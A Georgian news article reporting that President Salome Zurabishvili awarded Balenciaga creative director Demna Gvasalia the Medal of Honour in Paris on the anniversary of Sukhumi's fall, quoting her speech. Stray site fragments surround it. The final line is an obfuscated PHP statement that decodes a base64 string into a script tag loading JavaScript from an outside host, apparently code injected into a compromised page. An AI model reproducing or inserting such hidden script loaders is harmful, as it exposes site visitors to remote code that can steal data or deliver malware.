celsiusi
ავერსი შნაიდერი
საქართველოს პრეზიდენტმა სალომე ზურაბიშვილმა, პარიზში სამუშაო ვიზიტის ფარგლებში, საზღვარგარეთ ქართული დიასპორის გამორჩეული წარმომადგენელი, მოდის დიზაინერი, მოდის სახლის Balenciaga-ს კრეატიული დირექტორი დემნა გვასალია ღირსების მედლით დააჯილდოვა.
 
დაჯილდოების ცერემონიალი მოდის სახლ Balenciaga-ში გაიმართა.
 
პრეზიდენტმა დემნა გვასალიას საქართველოს სახელმწიფო ჯილდო მოდის სფეროში წარმატებული მოღვაწეობისა და საზღვარგარეთ საქართველოს პოპულარიზაციაში შეტანილი პირადი წვლილისათვის გადასცა და ქართველი ხალხის სახელით ჯილდოს მიღება მიულოცა.
 
"მე ძალიან ბედნიერი ვარ, რომ დღეს მეძლევა საშუალება გადმოგცეთ ეს ჯილდო, რომელიც იმ ყველაფრის დაფასებაა, რაც შეძელით და რასაც მიაღწიეთ.
 
ისე მოხდა, რომ ეს დაჯილდოება 27 სექტემბერს იმართება. ეს ის დღეა, რომელიც თქვენთვის კიდევ უფრო მძიმეა, ვიდრე სხვებისთვის, ვისაც ეს პერიოდი არ გაუვლია, მაგრამ სოხუმის დაცემის დღე მთელი საქართველოსთვის გლოვის დღეა, ჩვენი დროშები დაშვებულია, მაგრამ დღეს მე რომ აქ, თქვენთან ვარ, რათა ეს სახელმწიფო ჯილდო გადმოგცეთ, ეს ნიშნავს, რომ სადღაც ჩვენ მაინც უკვე გავიმარჯვეთ, რომ დღეს, შეიძლება ასეთი წარმატებული ადამიანი იყოს აფხაზეთიდან წამოსული ადამიანი, რომელმაც თავის დარგში, თავისი ნიჭითა და შრომით მსოფლიო დაიპყრო. ეს არის დღე, რომელიც არ ანელებს ტკივილს, რადგან მას ვერაფერი შეანელებს, მაგრამ იმას ნიშნავს, რომ ჩვენ ყველანი წინ მივდივართ და იმის გადაწყვეტაც ჯერ წინ არის, ამის იმედი გვაქვს ყველას და ამისი გვჯერა!
 
მინდა მოგილოცოთ ეს დღე. ვწუხვარ, რომ დედათქვენი ახლა აქ არ არის და ვერ იზიარებს ამ სიხარულს.
 
ქართველი ხალხის სახელით მადლობას გიხდით. მეც ემიგრანტის შვილი ვარ და მინდა გითხრათ, რომ თქვენ გახდით მაგალითი ქვეყნიდან გასული ახალგაზრდებისათვის და ყველასათვის, რომლებიც თქვენ გიყურებენ და ხედავენ, რომ თუ გინდა და შეგიძლია, თუ მზად ხარ რომ დაიხარჯო, ყველაფრის მიღწევა შესაძლებელია. ჩვენი პატარა ქვეყნისთვის ეს ძალიან დიდი მაგალითია და ამისთვის, მე როგორც საქართველოს პრეზიდენტი, ძალიან დიდ მადლობას გიხდით“, - განაცხადა საქართველოს პრეზიდენტმა დაჯილდოების ცერემონიაზე.
 
დემნა გვასალიამ მადლობა გადაუხადა საქართველოს პრეზიდენტს სახელმწიფო ჯილდოსა და მისი ხელოვნების აღიარებისათვის.
924
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");